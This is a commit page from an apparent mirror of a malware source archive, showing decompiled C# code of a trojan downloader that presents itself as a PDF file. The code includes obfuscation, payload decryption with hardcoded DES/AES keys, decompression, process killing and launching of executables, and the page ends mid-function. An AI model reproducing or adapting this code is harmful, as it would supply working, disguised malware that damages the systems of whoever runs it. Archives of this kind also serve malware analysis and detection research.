daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/AssemblyInfo.cs
+18
View File
@@ -0,0 +1,18 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: PoweredBy("Powered by SmartAssembly 6.6.3.41")]
[assembly: AssemblyTitle("Objeto de arquivo PDF ©")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Arquivo PDF")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("68ef6356-44bd-4a76-9d0f-4e9a5e4d8d3d")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/SmartAssembly/MemoryManagement/MemoryManager.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
internal static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
internal MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/Trojan-Downloader.Win32.Dapato.lnd.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CSPharm", "Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.csproj", "{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0001/_0001.cs
+26
View File
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.Reflection;
namespace \u0001
{
internal sealed class \u0001 : IDisposable
{
internal readonly Type \u0001;
internal readonly object \u0002;
public \u0001()
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
public void \u0001() => \u0001.\u0001(this);
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0002/_0001.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace \u0002
{
internal sealed class \u0001 : Attribute
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0002/_0002.cs
+92
View File
@@ -0,0 +1,92 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System.Runtime.InteropServices;
namespace \u0002
{
internal sealed class \u0002
{
internal static \u0002.\u0002.\u0001 \u0001;
internal static \u0002.\u0002.\u0002 \u0002;
internal static \u0002.\u0002.\u0003 \u0003;
internal static \u0002.\u0002.\u0004 \u0004;
internal static \u0002.\u0002.\u0005 \u0005;
internal static \u0002.\u0002.\u0006 \u0006;
internal static \u0002.\u0002.\u0007 \u0007;
internal static \u0002.\u0002.\u0008 \u0008;
internal static \u0002.\u0002.\u000E \u000E;
internal static \u0002.\u0002.\u000F \u000F;
internal static \u0002.\u0002.\u0010 \u0010;
internal static \u0002.\u0002.\u0011 \u0011;
internal static \u0002.\u0002.\u0012 \u0012;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0001
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0002
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0003
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0004
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0005
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0006
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0007
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0008
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000E
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000F
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0010
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0011
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0012
{
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0003/_0001.cs
+869
View File
@@ -0,0 +1,869 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0004;
using SmartAssembly.MemoryManagement;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0003
{
internal sealed class \u0001
{
static void \u0001([In] byte[] obj0, [In] \u0005.\u0003.\u0004 obj1)
{
int[] numArray1 = new int[16];
int[] numArray2 = new int[16];
if (true)
goto label_26;
label_4:
int index1;
for (; index1 < obj0.Length; ++index1)
{
int index2 = (int) obj0[index1];
if (index2 > 0)
++numArray1[index2];
}
int num1 = 0;
int length = 512;
for (int index3 = 1; index3 <= 15; ++index3)
{
numArray2[index3] = num1;
num1 += numArray1[index3] << 16 - index3;
if (index3 >= 10)
{
int num2 = numArray2[index3] & 130944;
int num3 = num1 & 130944;
length += num3 - num2 >> 16 - index3;
}
}
obj1.\u0001 = new short[length];
int num4 = 512;
for (int index4 = 15; index4 >= 10; --index4)
{
int num5 = num1 & 130944;
num1 -= numArray1[index4] << 16 - index4;
for (int index5 = num1 & 130944; index5 < num5; index5 += 128)
{
obj1.\u0001[(int) \u0003.\u0001.\u0001(index5)] = (short) (-num4 << 4 | index4);
num4 += 1 << index4 - 9;
}
}
for (int index6 = 0; index6 < obj0.Length; ++index6)
{
int index7 = (int) obj0[index6];
if (index7 != 0)
{
int num6 = numArray2[index7];
int index8 = (int) \u0003.\u0001.\u0001(num6);
if (index7 <= 9)
{
do
{
obj1.\u0001[index8] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < 512);
}
else
{
int num7 = (int) obj1.\u0001[index8 & 511];
int num8 = 1 << (num7 & 15);
int num9 = -(num7 >> 4);
do
{
obj1.\u0001[num9 | index8 >> 9] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < num8);
}
numArray2[index7] = num6 + (1 << 16 - index7);
}
}
return;
label_26:
index1 = 0;
goto label_4;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0005;
static bool \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0002 == obj0.\u0003;
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
if (obj0.\u0005 < obj1)
goto label_4;
label_3:
return (int) ((long) obj0.\u0004 & (long) ((1 << obj1) - 1));
label_4:
if (obj0.\u0002 == obj0.\u0003)
return -1;
obj0.\u0004 |= (uint) (((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue | ((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue) << 8) << obj0.\u0005);
obj0.\u0005 += 16;
goto label_3;
}
static bool \u0001([In] Assembly obj0, [In] Assembly obj1)
{
byte[] publicKey1 = obj1.GetName().GetPublicKey();
byte[] publicKey2 = obj0.GetName().GetPublicKey();
if (publicKey2 == null != (publicKey1 == null))
return false;
if (publicKey2 != null)
{
for (int index = 0; index < publicKey2.Length; ++index)
{
if ((int) publicKey2[index] != (int) publicKey1[index])
return false;
}
}
return true;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3)
{
int num1 = 0;
while (obj0.\u0005 > 0 && obj3 > 0)
{
obj1[obj2++] = (byte) obj0.\u0004;
obj0.\u0004 >>= 8;
obj0.\u0005 -= 8;
--obj3;
++num1;
}
if (obj3 == 0)
return num1;
int num2 = obj0.\u0003 - obj0.\u0002;
if (obj3 > num2)
obj3 = num2;
Array.Copy((Array) obj0.\u0001, obj0.\u0002, (Array) obj1, obj2, obj3);
obj0.\u0002 += obj3;
if ((obj0.\u0002 - obj0.\u0003 & 1) != 0)
{
obj0.\u0004 = (uint) obj0.\u0001[obj0.\u0002++] & (uint) byte.MaxValue;
obj0.\u0005 = 8;
}
return num1 + obj3;
}
static void \u0001([In] \u0002 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0002 obj0)
{
obj0.\u0004 >>= obj0.\u0005 & 7;
obj0.\u0005 &= -8;
}
static int \u0001([In] int obj0) => \u0003.\u0001.\u0001(obj0) * 2;
static bool \u0001([In] \u0005.\u0003.\u0001 obj0)
{
int num1 = \u0003.\u0001.\u0001(obj0.\u0011);
if (true)
goto label_25;
label_23:
int num2;
while (num2 >= 258)
{
switch (obj0.\u0005)
{
case 7:
int num3;
while (((num3 = \u0003.\u0001.\u0001(obj0.\u0013, obj0.\u0010)) & -256) == 0)
{
\u0003.\u0001.\u0001(obj0.\u0011, num3);
if (--num2 < 258)
return true;
}
if (num3 < 257)
{
if (num3 < 0)
return false;
obj0.\u0014 = (\u0005.\u0003.\u0004) null;
obj0.\u0013 = (\u0005.\u0003.\u0004) null;
obj0.\u0005 = 2;
return true;
}
obj0.\u0007 = \u0005.\u0003.\u0001.\u0001[num3 - 257];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0002[num3 - 257];
goto case 8;
case 8:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 8;
int num4 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num4 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0007 += num4;
}
obj0.\u0005 = 9;
goto case 9;
case 9:
int index = \u0003.\u0001.\u0001(obj0.\u0014, obj0.\u0010);
if (index < 0)
return false;
obj0.\u0008 = \u0005.\u0003.\u0001.\u0003[index];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0004[index];
goto case 10;
case 10:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 10;
int num5 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num5 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0008 += num5;
}
\u0003.\u0001.\u0001(obj0.\u0011, obj0.\u0007, obj0.\u0008);
num2 -= obj0.\u0007;
obj0.\u0005 = 7;
continue;
default:
continue;
}
}
return true;
label_25:
num2 = num1;
goto label_23;
}
static void \u0001([In] string obj0)
{
foreach (Process process in Process.GetProcessesByName(obj0))
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1314) + process.ProcessName + \u0005.\u0001.\u0001(1327));
process.Kill();
}
}
static bool \u0001([In] \u0005.\u0003.\u0005 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
while (true)
{
switch (obj0.\u0006)
{
case 0:
obj0.\u0007 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0007 >= 0)
{
obj0.\u0007 += 257;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u0006 = 1;
goto case 1;
}
else
goto label_2;
case 1:
obj0.\u0008 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0008 >= 0)
{
++obj0.\u0008;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u000F = obj0.\u0007 + obj0.\u0008;
obj0.\u0004 = new byte[obj0.\u000F];
obj0.\u0006 = 2;
goto case 2;
}
else
goto label_5;
case 2:
obj0.\u000E = \u0003.\u0001.\u0001(obj1, 4);
if (obj0.\u000E >= 0)
{
obj0.\u000E += 4;
\u0003.\u0001.\u0001(obj1, 4);
obj0.\u0003 = new byte[19];
obj0.\u0012 = 0;
obj0.\u0006 = 3;
goto case 3;
}
else
goto label_8;
case 3:
for (; obj0.\u0012 < obj0.\u000E; ++obj0.\u0012)
{
int num = \u0003.\u0001.\u0001(obj1, 3);
if (num < 0)
return false;
\u0003.\u0001.\u0001(obj1, 3);
obj0.\u0003[\u0005.\u0003.\u0005.\u0013[obj0.\u0012]] = (byte) num;
}
obj0.\u0005 = new \u0005.\u0003.\u0004(obj0.\u0003);
obj0.\u0003 = (byte[]) null;
obj0.\u0012 = 0;
obj0.\u0006 = 4;
goto case 4;
case 4:
int num1;
while (((num1 = \u0003.\u0001.\u0001(obj0.\u0005, obj1)) & -16) == 0)
{
obj0.\u0004[obj0.\u0012++] = obj0.\u0011 = (byte) num1;
if (obj0.\u0012 == obj0.\u000F)
return true;
}
if (num1 >= 0)
{
if (num1 >= 17)
obj0.\u0011 = (byte) 0;
obj0.\u0010 = num1 - 16;
obj0.\u0006 = 5;
goto case 5;
}
else
goto label_19;
case 5:
int num2 = \u0005.\u0003.\u0005.\u0002[obj0.\u0010];
int num3 = \u0003.\u0001.\u0001(obj1, num2);
if (num3 >= 0)
{
\u0003.\u0001.\u0001(obj1, num2);
int num4 = num3 + \u0005.\u0003.\u0005.\u0001[obj0.\u0010];
while (num4-- > 0)
obj0.\u0004[obj0.\u0012++] = obj0.\u0011;
if (obj0.\u0012 != obj0.\u000F)
{
obj0.\u0006 = 4;
continue;
}
goto label_29;
}
else
goto label_24;
default:
continue;
}
}
label_2:
return false;
label_5:
return false;
label_8:
return false;
label_19:
return false;
label_24:
return false;
label_29:
return true;
}
static byte[] \u0001([In] byte[] obj0)
{
Assembly callingAssembly = Assembly.GetCallingAssembly();
Assembly executingAssembly = Assembly.GetExecutingAssembly();
if ((object) callingAssembly != (object) executingAssembly && !\u0003.\u0001.\u0001(callingAssembly, executingAssembly))
return (byte[]) null;
\u0005.\u0003.\u0007 obj1 = new \u0005.\u0003.\u0007(obj0);
byte[] numArray1 = new byte[0];
int num1 = \u0003.\u0001.\u0001(obj1);
if (num1 == 67324752)
{
short num2 = (short) \u0003.\u0001.\u0001(obj1);
int num3 = \u0003.\u0001.\u0001(obj1);
int num4 = \u0003.\u0001.\u0001(obj1);
if (num1 != 67324752 || num2 != (short) 20 || num3 != 0 || num4 != 8)
throw new FormatException("Wrong Header Signature");
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
int length = \u0003.\u0001.\u0001(obj1);
int count1 = \u0003.\u0001.\u0001(obj1);
int count2 = \u0003.\u0001.\u0001(obj1);
if (count1 > 0)
{
byte[] buffer = new byte[count1];
obj1.Read(buffer, 0, count1);
}
if (count2 > 0)
{
byte[] buffer = new byte[count2];
obj1.Read(buffer, 0, count2);
}
byte[] buffer1 = new byte[obj1.Length - obj1.Position];
obj1.Read(buffer1, 0, buffer1.Length);
\u0005.\u0003.\u0001 obj2 = new \u0005.\u0003.\u0001(buffer1);
numArray1 = new byte[length];
\u0003.\u0001.\u0001(numArray1, numArray1.Length, obj2, 0);
}
else
{
int num5 = num1 >> 24;
if (num1 - (num5 << 24) != 8223355)
throw new FormatException("Unknown Header");
if (num5 == 1)
{
int length1 = \u0003.\u0001.\u0001(obj1);
numArray1 = new byte[length1];
int num6;
for (int index = 0; index < length1; index += num6)
{
int length2 = \u0003.\u0001.\u0001(obj1);
num6 = \u0003.\u0001.\u0001(obj1);
byte[] buffer = new byte[length2];
obj1.Read(buffer, 0, buffer.Length);
\u0005.\u0003.\u0001 obj3 = new \u0005.\u0003.\u0001(buffer);
\u0003.\u0001.\u0001(numArray1, num6, obj3, index);
}
}
if (num5 == 2)
{
byte[] numArray2 = new byte[8]
{
(byte) 203,
(byte) 141,
(byte) 238,
(byte) 96,
(byte) 34,
(byte) 246,
(byte) 159,
(byte) 67
};
byte[] numArray3 = new byte[8]
{
(byte) 138,
(byte) 87,
(byte) 245,
(byte) 25,
(byte) 232,
(byte) 206,
(byte) 94,
(byte) 109
};
using (\u0001.\u0001 obj4 = new \u0001.\u0001())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray3, obj4, numArray2, true))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
if (num5 == 3)
{
byte[] numArray4 = new byte[16]
{
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1
};
byte[] numArray5 = new byte[16]
{
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2
};
using (\u0002 obj5 = new \u0002())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray4, obj5, true, numArray5))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
}
obj1.Close();
return numArray1;
}
static int \u0001([In] \u0005.\u0003.\u0004 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
int index1;
if ((index1 = \u0003.\u0001.\u0001(obj1, 9)) < 0)
{
int num1 = obj1.\u0005;
int index2 = \u0003.\u0001.\u0001(obj1, num1);
int num2 = (int) obj0.\u0001[index2];
if (num2 < 0 || (num2 & 15) > num1)
return -1;
\u0003.\u0001.\u0001(obj1, num2 & 15);
return num2 >> 4;
}
\u0005.\u0003.\u0004 obj = obj0;
int num3;
if ((num3 = (int) obj.\u0001[index1]) >= 0)
{
\u0003.\u0001.\u0001(obj1, num3 & 15);
return num3 >> 4;
}
int num4 = -(num3 >> 4);
int num5 = num3 & 15;
int num6;
if ((num6 = \u0003.\u0001.\u0001(obj1, num5)) >= 0)
{
int num7 = (int) obj0.\u0001[num4 | num6 >> 9];
\u0003.\u0001.\u0001(obj1, num7 & 15);
return num7 >> 4;
}
int num8 = obj1.\u0005;
int num9 = \u0003.\u0001.\u0001(obj1, num8);
int num10 = (int) obj0.\u0001[num4 | num9 >> 9];
if ((num10 & 15) > num8)
return -1;
\u0003.\u0001.\u0001(obj1, num10 & 15);
return num10 >> 4;
}
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1, [In] int obj2)
{
if ((obj0.\u0003 += obj1) > 32768)
throw new InvalidOperationException();
int sourceIndex = obj0.\u0002 - obj2 & (int) short.MaxValue;
int num = 32768 - obj1;
if (sourceIndex <= num && obj0.\u0002 < num)
{
if (obj1 <= obj2)
{
Array.Copy((Array) obj0.\u0001, sourceIndex, (Array) obj0.\u0001, obj0.\u0002, obj1);
obj0.\u0002 += obj1;
}
else
{
while (obj1-- > 0)
obj0.\u0001[obj0.\u0002++] = obj0.\u0001[sourceIndex++];
}
}
else
\u0003.\u0001.\u0001(obj0, sourceIndex, obj1, obj2);
}
static void \u0001([In] string obj0)
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1332) + obj0 + \u0005.\u0001.\u0001(1327));
try
{
Process.Start(obj0);
}
catch (Exception ex1)
{
if (!(ex1.GetType().ToString() != \u0005.\u0001.\u0001(1353)))
return;
try
{
Process.Start(new ProcessStartInfo(\u0005.\u0001.\u0001(1402), obj0));
}
catch (Exception ex2)
{
}
}
}
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] numArray = new byte[obj0.\u0008];
byte[] destinationArray;
if (true)
destinationArray = numArray;
Array.Copy((Array) obj0.\u0004, obj0.\u0007, (Array) destinationArray, 0, obj0.\u0008);
return new \u0005.\u0003.\u0004(destinationArray);
}
static int \u0001([In] int obj0)
{
int num = 1;
for (int index = 0; index < 10; ++index)
num += obj0;
return num;
}
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0001.\u0001 obj1,
[In] byte[] obj2,
[In] bool obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj2
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj3 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] string obj0)
{
if (!\u0004.\u0001.\u0004)
return;
StreamWriter streamWriter = File.Exists(\u0005.\u0001.\u0001(1419)) ? File.AppendText(\u0005.\u0001.\u0001(1419)) : new StreamWriter(\u0005.\u0001.\u0001(1419));
streamWriter.WriteLine((object) DateTime.Now);
streamWriter.WriteLine(obj0);
streamWriter.WriteLine();
streamWriter.Close();
}
static int \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0003 obj3)
{
int num1 = obj3.\u0002;
if (obj0 > obj3.\u0003)
obj0 = obj3.\u0003;
else
num1 = obj3.\u0002 - obj3.\u0003 + obj0 & (int) short.MaxValue;
int num2 = obj0;
int length = obj0 - num1;
if (length > 0)
{
Array.Copy((Array) obj3.\u0001, 32768 - length, (Array) obj2, obj1, length);
obj1 += length;
obj0 = num1;
}
Array.Copy((Array) obj3.\u0001, num1 - obj0, (Array) obj2, obj1, obj0);
obj3.\u0003 -= num2;
if (obj3.\u0003 < 0)
throw new InvalidOperationException();
return num2;
}
static short \u0001([In] int obj0) => (short) ((int) \u0005.\u0003.\u0006.\u0002[obj0 & 15] << 12 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 4 & 15] << 8 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 8 & 15] << 4 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 12]);
static int \u0001([In] \u0005.\u0003.\u0003 obj0) => obj0.\u0003;
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0002 obj1,
[In] bool obj2,
[In] byte[] obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj3
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] \u0001.\u0001 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1)
{
\u0005.\u0003.\u0003 obj = obj0;
int num1;
int num2 = num1 = obj.\u0003;
obj.\u0003 = num1 + 1;
if (num2 == 32768)
throw new InvalidOperationException();
obj0.\u0001[obj0.\u0002++] = (byte) obj1;
obj0.\u0002 &= (int) short.MaxValue;
}
static void \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
obj0.\u0004 >>= obj1;
obj0.\u0005 -= obj1;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0003 - obj0.\u0002 + (obj0.\u0005 >> 3);
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] destinationArray = new byte[obj0.\u0007];
Array.Copy((Array) obj0.\u0004, 0, (Array) destinationArray, 0, obj0.\u0007);
return new \u0005.\u0003.\u0004(destinationArray);
}
static void \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0002 obj3)
{
if (obj3.\u0002 < obj3.\u0003)
throw new InvalidOperationException();
int num = obj1 + obj0;
if (0 > obj1 || obj1 > num || num > obj2.Length)
throw new ArgumentOutOfRangeException();
if ((obj0 & 1) != 0)
{
obj3.\u0004 |= (uint) (((int) obj2[obj1++] & (int) byte.MaxValue) << obj3.\u0005);
obj3.\u0005 += 8;
}
obj3.\u0001 = obj2;
obj3.\u0002 = obj1;
obj3.\u0003 = num;
}
static int \u0001([In] byte[] obj0, [In] int obj1, [In] \u0005.\u0003.\u0001 obj2, [In] int obj3)
{
int num1 = 0;
do
{
if (obj2.\u0005 != 11)
goto label_5;
label_2:
continue;
label_5:
int num2 = \u0003.\u0001.\u0001(obj1, obj3, obj0, obj2.\u0011);
obj3 += num2;
num1 += num2;
obj1 -= num2;
if (obj1 != 0)
goto label_2;
else
goto label_1;
}
